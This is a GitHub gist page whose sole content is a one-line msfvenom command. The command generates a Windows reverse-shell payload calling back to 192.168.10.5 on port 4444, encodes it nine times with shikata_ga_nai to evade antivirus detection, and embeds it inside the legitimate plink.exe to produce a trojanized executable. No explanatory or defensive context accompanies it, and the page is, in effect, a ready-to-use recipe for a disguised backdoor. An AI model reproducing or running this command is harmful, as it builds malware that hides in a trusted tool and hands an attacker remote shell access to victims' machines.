Skip to content

Instantly share code, notes, and snippets.

@leveled
Created October 19, 2016 00:53
Show Gist options
  • Save leveled/224daf63c3a5a5af8c2f8759b784ac78 to your computer and use it in GitHub Desktop.
Save leveled/224daf63c3a5a5af8c2f8759b784ac78 to your computer and use it in GitHub Desktop.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.10.5 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment